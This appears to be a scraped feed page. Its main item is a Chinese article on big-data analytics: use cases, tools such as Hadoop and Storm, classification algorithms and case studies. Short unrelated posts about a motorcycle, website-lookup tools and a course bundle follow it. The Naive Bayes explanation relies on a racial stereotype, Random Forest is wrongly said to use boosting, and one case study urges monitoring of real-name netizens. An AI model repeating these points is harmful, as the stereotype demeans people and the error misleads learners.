人工智能技术一直是科学家与技术人员的追求,但其发展并不是一帆风顺。例如最初的自然语言识别技术中,科学家希望通过语法规则使计算机理解语义从而实现智能化,但显示证明这一路径并不可行,其后依据大量数据样本的统计方法才有效的提升了自然语言处理的准确度并逐渐达到可用水平。

如今随着计算技术与数据量的提升,大数据能够带给我们的福利已经不仅限于资料的查找,识别语言、视觉的AI技术提供给我们的,除了经常看到的“个人助理”和动态美颜等功能外,仿照大脑结构进行写作、自动记录会议纪要、情绪识别与性格分析,甚至是视频内容的搜索等功能都能够对商业及产业起到较大的推动作用。

鸣谢:王刚

注:

Hadoop, 由Apache基金会所开发的分布式系统基础架构

HDFS是Hadoop中的分布式文件系统,适合运行在通用硬件设备上,具备高度容错性,能提供高吞吐量的数据访问,非常适合大规模数据集上的应用。

MapReduce是一种编程模型,用于大规模数据集(大于1TB)的并行运算,极大地方便了编程人员在不会分布式并行编程的情况下,将自己的程序运行在分布式系统上。

MPP,Massively Parallel Processing,意为大规模并行处理系统,这样的系统是由许多松耦合处理单元组成的,每个单元内的CPU都有自己私有的资源,在每个单元内都有操作系统和管理数据库的实例复本。

SAP是全球最大的企业管理和协同化商务解决方案供应商、全球第三大独立软件供应商,总部位于德国。

GFS是Google开发的可扩展分布式文件系统,用于大型的、分布式的、对大量数据进行访问的应用,能够运行于普通硬件上,并提供容错功能。

自 36kr



星河融快:2017年全球大数据产业报告之海外篇

          大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理   

大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

作者:Stephen Cui

一、大数据分析在商业上的应用

1、体育赛事预测

世界杯期间,谷歌、百度、微软和高盛等公司都推出了比赛结果预测平台。百度预测结果最为亮眼,预测全程64场比赛,准确率为67%,进入淘汰赛后准确率为94%。现在互联网公司取代章鱼保罗试水赛事预测也意味着未来的体育赛事会被大数据预测所掌控。

“在百度对世界杯的预测中,我们一共考虑了团队实力、主场优势、最近表现、世界杯整体表现和博彩公司的赔率等五个因素,这些数据的来源基本都是互联网,随后我们再利用一个由搜索专家设计的机器学习模型来对这些数据进行汇总和分析,进而做出预测结果。”—百度北京大数据实验室的负责人张桐


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

2、股票市场预测

去年英国华威商学院和美国波士顿大学物理系的研究发现,用户通过谷歌搜索的金融关键词或许可以金融市场的走向,相应的投资战略收益高达326%。此前则有专家尝试通过Twitter博文情绪来预测股市波动。

理论上来讲股市预测更加适合美国。中国股票市场无法做到双向盈利,只有股票涨才能盈利,这会吸引一些游资利用信息不对称等情况人为改变股票市场规律,因此中国股市没有相对稳定的规律则很难被预测,且一些对结果产生决定性影响的变量数据根本无法被监控。

目前,美国已经有许多对冲基金采用大数据技术进行投资,并且收获甚丰。中国的中证广发百度百发100指数基金(下称百发100),上线四个多月以来已上涨68%。

和传统量化投资类似,大数据投资也是依靠模型,但模型里的数据变量几何倍地增加了,在原有的金融结构化数据基础上,增加了社交言论、地理信息、卫星监测等非结构化数据,并且将这些非结构化数据进行量化,从而让模型可以吸收。

由于大数据模型对成本要求极高,业内人士认为,大数据将成为共享平台化的服务,数据和技术相当于食材和锅,基金经理和分析师可以通过平台制作自己的策略。

http://v.youku.com/v_show/id_XMzU0ODIxNjg0.html

3、市场物价预测

CPI表征已经发生的物价浮动情况,但统计局数据并不权威。但大数据则可能帮助人们了解未来物价走向,提前预知通货膨胀或经济危机。最典型的案例莫过于马云通过阿里B2B大数据提前知晓亚洲金融危机,当然这是阿里数据团队的功劳。

4、用户行为预测

基于用户搜索行为、浏览行为、评论历史和个人资料等数据,互联网业务可以洞察消费者的整体需求,进而进行针对性的产品生产、改进和营销。《纸牌屋》选择演员和剧情、百度基于用户喜好进行精准广告营销、阿里根据天猫用户特征包下生产线定制产品、亚马逊预测用户点击行为提前发货均是受益于互联网用户行为预测。

购买前的行为信息,可以深度地反映出潜在客户的购买心理和购买意向:例如,客户 A 连续浏览了 5 款电视机,其中 4 款来自国内品牌 S,1 款来自国外品牌 T;4 款为 LED 技术,1 款为 LCD 技术;5 款的价格分别为 4599 元、5199 元、5499 元、5999 元、7999 元;这些行为某种程度上反映了客户 A 对品牌认可度及倾向性,如偏向国产品牌、中等价位的 LED 电视。而客户 B 连续浏览了 6 款电视机,其中 2 款是国外品牌 T,2 款是另一国外品牌 V,2 款是国产品牌 S;4 款为 LED 技术,2 款为 LCD 技术;6 款的价格分别为 5999 元、7999 元、8300 元、9200 元、9999 元、11050 元;类似地,这些行为某种程度上反映了客户 B 对品牌认可度及倾向性,如偏向进口品牌、高价位的 LED 电视等。

http://36kr.com/p/205901.html

5、人体健康预测

中医可以通过望闻问切手段发现一些人体内隐藏的慢性病,甚至看体质便可知晓一个人将来可能会出现什么症状。人体体征变化有一定规律,而慢性病发生前人体已经会有一些持续性异常。理论上来说,如果大数据掌握了这样的异常情况,便可以进行慢性病预测。

6、疾病疫情预测

基于人们的搜索情况、购物行为预测大面积疫情爆发的可能性,最经典的“流感预测”便属于此类。如果来自某个区域的“流感”、“板蓝根”搜索需求越来越多,自然可以推测该处有流感趋势。

Google成功预测冬季流感:
2009年,Google通过分析5000万条美国人最频繁检索的词汇,将之和美国疾病中心在2003年到2008年间季节性流感传播时期的数据进行比较,并建立一个特定的数学模型。最终google成功预测了2009冬季流感的传播甚至可以具体到特定的地区和州。

7、灾害灾难预测

气象预测是最典型的灾难灾害预测。地震、洪涝、高温、暴雨这些自然灾害如果可以利用大数据能力进行更加提前的预测和告知便有助于减灾防灾救灾赈灾。与过往不同的是,过去的数据收集方式存在着死角、成本高等问题,物联网时代可以借助廉价的传感器摄像头和无线通信网络,进行实时的数据监控收集,再利用大数据预测分析,做到更精准的自然灾害预测。

8、环境变迁预测

除了进行短时间微观的天气、灾害预测之外,还可以进行更加长期和宏观的环境和生态变迁预测。森林和农田面积缩小、野生动物植物濒危、海岸线上升,温室效应这些问题是地球面临的“慢性问题“。如果人类知道越多地球生态系统以及天气形态变化数据,就越容易模型化未来环境的变迁,进而阻止不好的转变发生。而大数据帮助人类收集、储存和挖掘更多的地球数据,同时还提供了预测的工具。

9、交通行为预测

基于用户和车辆的LBS定位数据,分析人车出行的个体和群体特征,进行交通行为的预测。交通部门可预测不同时点不同道路的车流量进行智能的车辆调度,或应用潮汐车道;用户则可以根据预测结果选择拥堵几率更低的道路。

百度基于地图应用的LBS预测涵盖范围更广。春运期间预测人们的迁徙趋势指导火车线路和航线的设置,节假日预测景点的人流量指导人们的景区选择,平时还有百度热力图来告诉用户城市商圈、动物园等地点的人流情况,指导用户出行选择和商家的选点选址。

多尔戈夫的团队利用机器学习算法来创造路上行人的模型。无人驾驶汽车行驶的每一英里路程的情况都会被记录下来,汽车电脑就会保持这些数据,并分析各种不同的对象在不同的环境中如何表现。有些司机的行为可能会被设置为固定变量(如“绿灯亮,汽车行”),但是汽车电脑不会死搬硬套这种逻辑,而是从实际的司机行为中进行学习。

这样一来,跟在一辆垃圾运输卡车后面行驶的汽车,如果卡车停止行进,那么汽车可能会选择变道绕过去,而不是也跟着停下来。谷歌已建立了70万英里的行驶数据,这有助于谷歌汽车根据自己的学习经验来调整自己的行为。


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

http://www.5lian.cn/html/2014/chelianwang_0522/42125_4.html

10、能源消耗预测

加州电网系统运营中心管理着加州超过80%的电网,向3500万用户每年输送2.89亿兆瓦电力,电力线长度超过25000英里。该中心采用了Space-Time Insight的软件进行智能管理,综合分析来自包括天气、传感器、计量设备等各种数据源的海量数据,预测各地的能源需求变化,进行智能电能调度,平衡全网的电力供应和需求,并对潜在危机做出快速响应。中国智能电网业已在尝试类似大数据预测应用。

二、大数据分析种类 按照数据分析的实时性,分为实时数据分析和离线数据分析两种。

实时数据分析一般用于金融、移动和互联网B2C等产品,往往要求在数秒内返回上亿行数据的分析,从而达到不影响用户体验的目的。要满足这样的需求,可以采用精心设计的传统关系型数据库组成并行处理集群,或者采用一些内存计算平台,或者采用HDD的架构,这些无疑都需要比较高的软硬件成本。目前比较新的海量数据实时分析工具有EMC的Greenplum、SAP的HANA等。

对于大多数反馈时间要求不是那么严苛的应用,比如离线统计分析、机器学习、搜索引擎的反向索引计算、推荐引擎的计算等,应采用离线分析的方式,通过数据采集工具将日志数据导入专用的分析平台。但面对海量数据,传统的ETL工具往往彻底失效,主要原因是数据格式转换的开销太大,在性能上无法满足海量数据的采集需求。互联网企业的海量数据采集工具,有Facebook开源的Scribe、LinkedIn开源的Kafka、淘宝开源的Timetunnel、Hadoop的Chukwa等,均可以满足每秒数百MB的日志数据采集和传输需求,并将这些数据上载到Hadoop中央系统上。

按照大数据的数据量,分为内存级别、BI级别、海量级别三种。

这里的内存级别指的是数据量不超过集群的内存最大值。不要小看今天内存的容量,Facebook缓存在内存的Memcached中的数据高达320TB,而目前的PC服务器,内存也可以超过百GB。因此可以采用一些内存数据库,将热点数据常驻内存之中,从而取得非常快速的分析能力,非常适合实时分析业务。图1是一种实际可行的MongoDB分析架构。


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

图1 用于实时分析的MongoDB架构

MongoDB大集群目前存在一些稳定性问题,会发生周期性的写堵塞和主从同步失效,但仍不失为一种潜力十足的可以用于高速数据分析的NoSQL。

此外,目前大多数服务厂商都已经推出了带4GB以上SSD的解决方案,利用内存+SSD,也可以轻易达到内存分析的性能。随着SSD的发展,内存数据分析必然能得到更加广泛的应用。

BI级别指的是那些对于内存来说太大的数据量,但一般可以将其放入传统的BI产品和专门设计的BI数据库之中进行分析。目前主流的BI产品都有支持TB级以上的数据分析方案。种类繁多。

海量级别指的是对于数据库和BI产品已经完全失效或者成本过高的数据量。海量数据级别的优秀企业级产品也有很多,但基于软硬件的成本原因,目前大多数互联网企业采用Hadoop的HDFS分布式文件系统来存储数据,并使用MapReduce进行分析。本文稍后将主要介绍Hadoop上基于MapReduce的一个多维数据分析平台。

三、大数据分析一般过程

3.1 采集

大数据的采集是指利用多个数据库来接收发自客户端(Web、App或者传感器形式等)的 数据,并且用户可以通过这些数据库来进行简单的查询和处理工作。比如,电商会使用传统的关系型数据库mysql和Oracle等来存储每一笔事务数据,除 此之外,Redis和MongoDB这样的NoSQL数据库也常用于数据的采集。

在大数据的采集过程中,其主要特点和挑战是并发数高,因为同时有可能会有成千上万的用户 来进行访问和操作,比如火车票售票网站和淘宝,它们并发的访问量在峰值时达到上百万,所以需要在采集端部署大量数据库才能支撑。并且如何在这些数据库之间 进行负载均衡和分片的确是需要深入的思考和设计。

3.2 导入/预处理

虽然采集端本身会有很多数据库,但是如果要对这些海量数据进行有效的分析,还是应该将这 些来自前端的数据导入到一个集中的大型分布式数据库,或者分布式存储集群,并且可以在导入基础上做一些简单的清洗和预处理工作。也有一些用户会在导入时使 用来自Twitter的Storm来对数据进行流式计算,来满足部分业务的实时计算需求。
导入与预处理过程的特点和挑战主要是导入的数据量大,每秒钟的导入量经常会达到百兆,甚至千兆级别。

3.3 统计/分析

统计与分析主要利用分布式数据库,或者分布式计算集群来对存储于其内的海量数据进行普通 的分析和分类汇总等,以满足大多数常见的分析需求,在这方面,一些实时性需求会用到EMC的GreenPlum、Oracle的Exadata,以及基于 MySQL的列式存储Infobright等,而一些批处理,或者基于半结构化数据的需求可以使用Hadoop。
统计与分析这部分的主要特点和挑战是分析涉及的数据量大,其对系统资源,特别是I/O会有极大的占用。

3.4 挖掘

与前面统计和分析过程不同的是,数据挖掘一般没有什么预先设定好的主题,主要是在现有数 据上面进行基于各种算法的计算,从而起到预测(Predict)的效果,从而实现一些高级别数据分析的需求。比较典型算法有用于聚类的Kmeans、用于 统计学习的SVM和用于分类的NaiveBayes,主要使用的工具有Hadoop的Mahout等。该过程的特点和挑战主要是用于挖掘的算法很复杂,并 且计算涉及的数据量和计算量都很大,常用数据挖掘算法都以单线程为主。


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理
四、大数据分析工具

4.1 Hadoop

Hadoop 是一个能够对大量数据进行分布式处理的软件框架。但是 Hadoop 是以一种可靠、高效、可伸缩的方式进行处理的。Hadoop 是可靠的,因为它假设计算元素和存储会失败,因此它维护多个工作数据副本,确保能够针对失败的节点重新分布处理。Hadoop 是高效的,因为它以并行的方式工作,通过并行处理加快处理速度。Hadoop 还是可伸缩的,能够处理 PB 级数据。此外,Hadoop 依赖于社区服务器,因此它的成本比较低,任何人都可以使用。

Hadoop是一个能够让用户轻松架构和使用的分布式计算平台。用户可以轻松地在Hadoop上开发和运行处理海量数据的应用程序。它主要有以下几个优点:

高可靠性。Hadoop按位存储和处理数据的能力值得人们信赖。 高扩展性。Hadoop是在可用的计算机集簇间分配数据并完成计算任务的,这些集簇可以方便地扩展到数以千计的节点中。 高效性。Hadoop能够在节点之间动态地移动数据,并保证各个节点的动态平衡,因此处理速度非常快。 高容错性。Hadoop能够自动保存数据的多个副本,并且能够自动将失败的任务重新分配。

Hadoop带有用 Java 语言编写的框架,因此运行在 linux 生产平台上是非常理想的。Hadoop 上的应用程序也可以使用其他语言编写,比如 C++。

4.2 HPCC

HPCC,High Performance Computing and Communications(高性能计算与通信)的缩写。1993年,由美国科学、工程、技术联邦协调理事会向国会提交了“重大挑战项目:高性能计算与 通信”的报告,也就是被称为HPCC计划的报告,即美国总统科学战略项目,其目的是通过加强研究与开发解决一批重要的科学与技术挑战问题。HPCC是美国 实施信息高速公路而上实施的计划,该计划的实施将耗资百亿美元,其主要目标要达到:开发可扩展的计算系统及相关软件,以支持太位级网络传输性能,开发千兆 比特网络技术,扩展研究和教育机构及网络连接能力。

该项目主要由五部分组成:

高性能计算机系统(HPCS),内容包括今后几代计算机系统的研究、系统设计工具、先进的典型系统及原有系统的评价等; 先进软件技术与算法(ASTA),内容有巨大挑战问题的软件支撑、新算法设计、软件分支与工具、计算计算及高性能计算研究中心等; 国家科研与教育网格(NREN),内容有中接站及10亿位级传输的研究与开发; 基本研究与人类资源(BRHR),内容有基础研究、培训、教育及课程教材,被设计通过奖励调查者-开始的,长期 的调查在可升级的高性能计算中来增加创新意识流,通过提高教育和高性能的计算训练和通信来加大熟练的和训练有素的人员的联营,和来提供必需的基础架构来支 持这些调查和研究活动; 信息基础结构技术和应用(IITA),目的在于保证美国在先进信息技术开发方面的领先地位。

4.3 Storm

Storm是自由的开源软件,一个分布式的、容错的实时计算系统。Storm可以非常可靠的处理庞大的数据流,用于处理Hadoop的批量数据。Storm很简单,支持许多种编程语言,使用起来非常有趣。Storm由Twitter开源而来,其它知名的应用企业包括Groupon、淘宝、支付宝、阿里巴巴、乐元素、Admaster等等。

Storm有许多应用领域:实时分析、在线机器学习、不停顿的计算、分布式RPC(远过程调用协议,一种通过网络从远程计算机程序上请求服务)、 ETL(Extraction-Transformation-Loading的缩写,即数据抽取、转换和加载)等等。Storm的处理速度惊人:经测 试,每个节点每秒钟可以处理100万个数据元组。Storm是可扩展、容错,很容易设置和操作。

4.4 Apache Drill

为了帮助企业用户寻找更为有效、加快Hadoop数据查询的方法,Apache软件基金会近日发起了一项名为“Drill”的开源项目。Apache Drill 实现了 Google’s Dremel.

据Hadoop厂商MapRTechnologies公司产品经理Tomer Shiran介绍,“Drill”已经作为Apache孵化器项目来运作,将面向全球软件工程师持续推广。

该项目将会创建出开源版本的谷歌Dremel Hadoop工具(谷歌使用该工具来为Hadoop数据分析工具的互联网应用提速)。而“Drill”将有助于Hadoop用户实现更快查询海量数据集的目的。

“Drill”项目其实也是从谷歌的Dremel项目中获得灵感:该项目帮助谷歌实现海量数据集的分析处理,包括分析抓取Web文档、跟踪安装在Android Market上的应用程序数据、分析垃圾邮件、分析谷歌分布式构建系统上的测试结果等等。

通过开发“Drill”Apache开源项目,组织机构将有望建立Drill所属的API接口和灵活强大的体系架构,从而帮助支持广泛的数据源、数据格式和查询语言。

4.5 RapidMiner

RapidMiner是世界领先的数据挖掘解决方案,在一个非常大的程度上有着先进技术。它数据挖掘任务涉及范围广泛,包括各种数据艺术,能简化数据挖掘过程的设计和评价。

功能和特点

免费提供数据挖掘技术和库 100%用Java代码(可运行在操作系统) 数据挖掘过程简单,强大和直观 内部XML保证了标准化的格式来表示交换数据挖掘过程 可以用简单脚本语言自动进行大规模进程 多层次的数据视图,确保有效和透明的数据 图形用户界面的互动原型 命令行(批处理模式)自动大规模应用 Java API(应用编程接口) 简单的插件和推广机制 强大的可视化引擎,许多尖端的高维数据的可视化建模 400多个数据挖掘运营商支持

耶鲁大学已成功地应用在许多不同的应用领域,包括文本挖掘,多媒体挖掘,功能设计,数据流挖掘,集成开发的方法和分布式数据挖掘。

4.6 Pentaho BI

Pentaho BI 平台不同于传统的BI 产品,它是一个以流程为中心的,面向解决方案(Solution)的框架。其目的在于将一系列企业级BI产品、开源软件、API等等组件集成起来,方便商务智能应用的开发。它的出现,使得一系列的面向商务智能的独立产品如Jfree、Quartz等等,能够集成在一起,构成一项项复杂的、完整的商务智能解决方案。

Pentaho BI 平台,Pentaho Open BI 套件的核心架构和基础,是以流程为中心的,因为其中枢控制器是一个工作流引擎。工作流引擎使用流程定义来定义在BI 平台上执行的商业智能流程。流程可以很容易的被定制,也可以添加新的流程。BI 平台包含组件和报表,用以分析这些流程的性能。目前,Pentaho的主要组成元素包括报表生成、分析、数据挖掘和工作流管理等等。这些组件通过 J2EE、WebService、SOAP、HTTP、Java、javascript、Portals等技术集成到Pentaho平台中来。 Pentaho的发行,主要以Pentaho SDK的形式进行。

Pentaho SDK共包含五个部分:Pentaho平台、Pentaho示例数据库、可独立运行的Pentaho平台、Pentaho解决方案示例和一个预先配制好的 Pentaho网络服务器。其中Pentaho平台是Pentaho平台最主要的部分,囊括了Pentaho平台源代码的主体;Pentaho数据库为 Pentaho平台的正常运行提供的数据服务,包括配置信息、Solution相关的信息等等,对于Pentaho平台来说它不是必须的,通过配置是可以用其它数据库服务取代的;可独立运行的Pentaho平台是Pentaho平台的独立运行模式的示例,它演示了如何使Pentaho平台在没有应用服务器支持的情况下独立运行;

Pentaho解决方案示例是一个Eclipse工程,用来演示如何为Pentaho平台开发相关的商业智能解决方案。

Pentaho BI 平台构建于服务器,引擎和组件的基础之上。这些提供了系统的J2EE 服务器,安全,portal,工作流,规则引擎,图表,协作,内容管理,数据集成,分析和建模功能。这些组件的大部分是基于标准的,可使用其他产品替换之。

4.7 SAS Enterprise Miner

§ 支持整个数据挖掘过程的完备工具集 § 易用的图形界面,适合不同类型的用户快速建模 § 强大的模型管理和评估功能 § 快速便捷的模型发布机制, 促进业务闭环形成 五、数据分析算法

大数据分析主要依靠机器学习和大规模计算。机器学习包括监督学习、非监督学习、强化学习等,而监督学习又包括分类学习、回归学习、排序学习、匹配学习等(见图1)。分类是最常见的机器学习应用问题,比如垃圾邮件过滤、人脸检测、用户画像、文本情感分析、网页归类等,本质上都是分类问题。分类学习也是机器学习领域,研究最彻底、使用最广泛的一个分支。

最近、Fernández-Delgado等人在JMLR(Journal of Machine Learning Research,机器学习顶级期刊)杂志发表了一篇有趣的论文。他们让179种不同的分类学习方法(分类学习算法)在UCI 121个数据集上进行了“大比武”(UCI是机器学习公用数据集,每个数据集的规模都不大)。结果发现Random Forest(随机森林)和SVM(支持向量机)名列第一、第二名,但两者差异不大。在84.3%的数据上、Random Forest压倒了其它90%的方法。也就是说,在大多数情况下,只用Random Forest 或 SVM事情就搞定了。


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

https://github.com/linyiqun/DataMiningAlgorithm

KNN

K最近邻算法。给定一些已经训练好的数据,输入一个新的测试数据点,计算包含于此测试数据点的最近的点的分类情况,哪个分类的类型占多数,则此测试点的分类与此相同,所以在这里,有的时候可以复制不同的分类点不同的权重。近的点的权重大点,远的点自然就小点。详细介绍链接

Naive Bayes

朴素贝叶斯算法。朴素贝叶斯算法是贝叶斯算法里面一种比较简单的分类算法,用到了一个比较重要的贝叶斯定理,用一句简单的话概括就是条件概率的相互转换推导。详细介绍链接

朴素贝叶斯分类是一种十分简单的分类算法,叫它朴素贝叶斯分类是因为这种方法的思想真的很朴素,朴素贝叶斯的思想基础是这样的:对于给出的待分类项,求解在此项出现的条件下各个类别出现的概率,哪个最大,就认为此待分类项属于哪个类别。通俗来说,就好比这么个道理,你在街上看到一个黑人,我问你你猜这哥们哪里来的,你十有八九猜非洲。为什么呢?因为黑人中非洲人的比率最高,当然人家也可能是美洲人或亚洲人,但在没有其它可用信息下,我们会选择条件概率最大的类别,这就是朴素贝叶斯的思想基础。

SVM

支持向量机算法。支持向量机算法是一种对线性和非线性数据进行分类的方法,非线性数据进行分类的时候可以通过核函数转为线性的情况再处理。其中的一个关键的步骤是搜索最大边缘超平面。详细介绍链接

Apriori

Apriori算法是关联规则挖掘算法,通过连接和剪枝运算挖掘出频繁项集,然后根据频繁项集得到关联规则,关联规则的导出需要满足最小置信度的要求。详细介绍链接

PageRank

网页重要性/排名算法。PageRank算法最早产生于Google,核心思想是通过网页的入链数作为一个网页好快的判定标准,如果1个网页内部包含了多个指向外部的链接,则PR值将会被均分,PageRank算法也会遭到LinkSpan攻击。详细介绍链接

RandomForest

随机森林算法。算法思想是决策树+boosting.决策树采用的是CART分类回归数,通过组合各个决策树的弱分类器,构成一个最终的强分类器,在构造决策树的时候采取随机数量的样本数和随机的部分属性进行子决策树的构建,避免了过分拟合的现象发生。详细介绍链接

Artificial Neural Network

“神经网络”这个词实际是来自于生物学,而我们所指的神经网络正确的名称应该是“人工神经网络(ANNs)”。
人工神经网络也具有初步的自适应与自组织能力。在学习或训练过程中改变突触权重值,以适应周围环境的要求。同一网络因学习方式及内容不同可具有不同的功能。人工神经网络是一个具有学习能力的系统,可以发展知识,以致超过设计者原有的知识水平。通常,它的学习训练方式可分为两种,一种是有监督或称有导师的学习,这时利用给定的样本标准进行分类或模仿;另一种是无监督学习或称无为导师学习,这时,只规定学习方式或某些规则,则具体的学习内容随系统所处环境 (即输入信号情况)而异,系统可以自动发现环境特征和规律性,具有更近似人脑的功能。 六、 案例

6.1 啤酒与尿布


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

“啤酒与尿布”的故事产生于20世纪90年代的美国沃尔玛超市中,沃尔玛的超市管理人员分析销售数据时发现了一个令人难于理解的现象:在某些特定的情况下,“啤酒”与“尿布”两件看上去毫无关系的商品会经常出现在同一个购物篮中,这种独特的销售现象引起了管理人员的注意,经过后续调查发现,这种现象出现在年轻的父亲身上。

在美国有婴儿的家庭中,一般是母亲在家中照看婴儿,年轻的父亲前去超市购买尿布。父亲在购买尿布的同时,往往会顺便为自己购买啤酒,这样就会出现啤酒与尿布这两件看上去不相干的商品经常会出现在同一个购物篮的现象。如果这个年轻的父亲在卖场只能买到两件商品之一,则他很有可能会放弃购物而到另一家商店, 直到可以一次同时买到啤酒与尿布为止。沃尔玛发现了这一独特的现象,开始在卖场尝试将啤酒与尿布摆放在相同的区域,让年轻的父亲可以同时找到这两件商品,并很快地完成购物;而沃尔玛超市也可以让这些客户一次购买两件商品、而不是一件,从而获得了很好的商品销售收入,这就是“啤酒与尿布” 故事的由来。

当然“啤酒与尿布”的故事必须具有技术方面的支持。1993年美国学者Agrawal提出通过分析购物篮中的商品集合,从而找出商品之间关联关系的关联算法,并根据商品之间的关系,找出客户的购买行为。艾格拉沃从数学及计算机算法角度提 出了商品关联关系的计算方法——Aprior算法。沃尔玛从上个世纪 90 年代尝试将 Aprior算法引入到 POS机数据分析中,并获得了成功,于是产生了“啤酒与尿布”的故事。

6.2 数据分析帮助辛辛那提动物园提高客户满意度


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

辛辛那提动植物园成立于1873年,是世界上著名的动植物园之一,以其物种保护和保存以及高成活率繁殖饲养计划享有极高声誉。它占地面积71英亩,园内有500种动物和3000多种植物,是国内游客人数最多的动植物园之一,曾荣获Zagat十佳动物园,并被《父母》(Parent)杂志评为最受儿童喜欢的动物园,每年接待游客130多万人。

辛辛那提动植物园是一个非营利性组织,是俄亥州同时也是美国国内享受公共补贴最低的动植物园,除去政府补贴,2600万美元年度预算中,自筹资金部分达到三分之二以上。为此,需要不断地寻求增加收入。而要做到这一点,最好办法是为工作人员和游客提供更好的服务,提高游览率。从而实现动植物园与客户和纳税人的双赢。

借助于该方案强大的收集和处理能力、互联能力、分析能力以及随之带来的洞察力,在部署后,企业实现了以下各方面的受益: 帮助动植物园了解每个客户浏览、使用和消费模式,根据时间和地理分布情况采取相应的措施改善游客体验,同时实现营业收入最大化。 根据消费和游览行为对动植物园游客进行细分,针对每一类细分游客开展营销和促销活动,显著提高忠诚度和客户保有量。. 识别消费支出低的游客,针对他们发送具有战略性的直寄广告,同时通过具有创意性的营销和激励计划奖励忠诚客户。 360度全方位了解客户行为,优化营销决策,实施解决方案后头一年节省40,000多美元营销成本,同时强化了可测量的结果。 采用地理分析显示大量未实现预期结果的促销和折扣计划,重新部署资源支持产出率更高的业务活动,动植物园每年节省100,000多美元。 通过强化营销提高整体游览率,2011年至少新增50,000人次“游览”。 提供洞察结果强化运营管理。例如,即将关门前冰激淋销售出现高潮,动植物园决定延长冰激淋摊位营业时间,直到关门为止。这一措施夏季每天可增加2,000美元收入。 与上年相比,餐饮销售增加30.7%,零售销售增加5.9%。 动植物园高层管理团队可以制定更好的决策,不需要 IT 介入或提供支持。 将分析引入会议室,利用直观工具帮助业务人员掌握数据。

6.3 云南昭通警察打中学生事件舆情分析

起因:

5月20日,有网友在微博上爆料称:云南昭通鲁甸二中初二学生孔德政,对着3名到该校出警并准备上车返回的警察说了一句“打电话那个,下来”,车内的两名警员听到动静后下来,追到该学生后就是一顿拳打脚踢。

5月26日,昭通市鲁甸县公安局新闻办回应此事:鲁甸县公安局已对当事民警停止执行职务,对殴打学生的两名协警作出辞退处理,并将根据调查情况依法依规作进一步处理。同时,鲁甸县公安局将加大队伍教育管理力度,坚决防止此类事件的再次发生。

经过:


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

5月26日,事件的舆情热度急剧上升,媒体报道内容侧重于“班主任称此学生平时爱起哄学习成绩差”“被打学生的同学去派出所讨说法”“学校要求学生删除照片”等方面,而学校要求删除图片等行为的曝光让事件舆情有扩大化趋势。

5月26日晚间,新华网发布新闻《警方回应“云南一学生遭2名警察暴打”:民警停职协警辞退》,中央主流网络媒体公布官方处置结果,网易、新浪、腾讯等门户网站予以转发,从而让官方的处置得以较大范围传播。


大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

昭通警察打中学生事件舆论关注度走势(抽样条数:290条)

总结:

“警察打学生,而且有图有真相,在事发5天后,昭通市鲁甸县警方最终还是站在了舆论的风口浪尖。事发后当地官方积极回应,并于5月26日将涉事人予以处理,果断的责任切割较为有效地抚平了舆论情绪,从而较好地化解了此次舆论危机。

从事件的传播来看,事发时间是5月20日,舆论热议则出现在25日,4天的平静期让鲁甸警方想当然地以为事件就此了结,或许当事人都已淡忘此事。如果不是云南当地活跃网友“直播云南”于5月25日发布关于此事的消息,并被当地传统媒体《生活新报》关注的话,事情或许真的就此结束,然而舆情发展不允许假设的存在。这一点,至少给我们以警示,对微博等自媒体平台上的负面信息要实时监测,对普通草根要监测,对本地实名认证的活跃网友更需监测。从某种角度看,本地实名认证的网友是更为强大的“舆论发动机”,负面消息一旦经他们发布或者转发,所带来的传播和形成的舆论压力更大。

在此事件中,校方也扮演着极为重要的角色。无论是被打学生的班主任,还是学校层面,面对此事件的回应都欠妥当。学校层面的“删除照片”等指示极易招致网友和学生的反感,在此反感情绪下,只会加剧学生传播事件的冲动。班主任口中该学生“学习不好、爱起哄”等负面印象被理解成“该学生活该被打”,在教师整体形象不佳的背景下,班主任的这些言论是责任感缺失的一种体现。校方和班主任的不恰当行为让事件处置难度和舆论引导难度明显增加,实在不该。“ — 人民网舆情监测室主任舆情分析师朱明刚

七、大数据云图展示
大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理
大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理
大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理

End.

转载请注明来自36大数据(36dsj.com):36大数据 大数据就在你身边 | 生活中大数据分析案例以及背后的技术原理


          Bajaj Pulsar 160NS launched | vs Gixxer, Apache, FZ   

Bajaj motors has finally launched the Pulsar 160NS in India for a price of Rs. 78,368 (ex-showroom, Delhi). The bike has been in the news since 2013 and now that it’s launched, we can leave all the speculations and rumours behind. Price Rs. 78,368 Launch date 30/06/2017 Engine 160.3cc Power 15.5 Ps   The Bajaj Pulsar 160NS seems like a solid machine from the Indian manufacturer. It adopts the Pulsar 200NS’ design language, which is a definite plus point. The bike gets a single headlamp set-up at the front, chiselled fuel tank (12l), split seats and rear tyre huggers. The […]

The post Bajaj Pulsar 160NS launched | vs Gixxer, Apache, FZ appeared first on Autopromag.


          Know Your website   
Here are few Online tools to know your website

1) Web Hosting India
100 GB Space, 2 free domains, host 10 sites, Windows/Linux Rs. 300/m
www.NetwayWeb.net

2) Just-Ping.com - It will help you to know your website or blog is accessible from different cities of the world

3) WhoIsTheOwner.net - To know the contact address, email and phone number of the website owner.

4) YouGetSignal.com - The web server that is hosting your website may also be housing dozens of other websites

5) WhoIsHostingThis.com - Enter the URL of any website and this online service will show you the name of the company that’s hosting the website.


6) SocialMeter.com - This service helps you determine the popularity of a web page on social sites like Digg, delicious, Google Bookmarks, etc

7) BuiltWith.com - Is Digg running on Apache or Windows Servers ? What advertising programs is Arrington using to monetize TechCrunch ? Is Google using Urchin for web analytics ? Is CNN using Akamai ? For answers to all these questions, refer to BuiltWith - a website profiling service that tells you about all the technologies used in creating a website(Source: Labnol)

          The Ultimate Data Infrastructure Architect Bundle for $36   
From MongoDB to Apache Flume, This Comprehensive Bundle Will Have You Managing Data Like a Pro In No Time
Expires June 01, 2022 23:59 PST
Buy now and get 94% off

Learning ElasticSearch 5.0


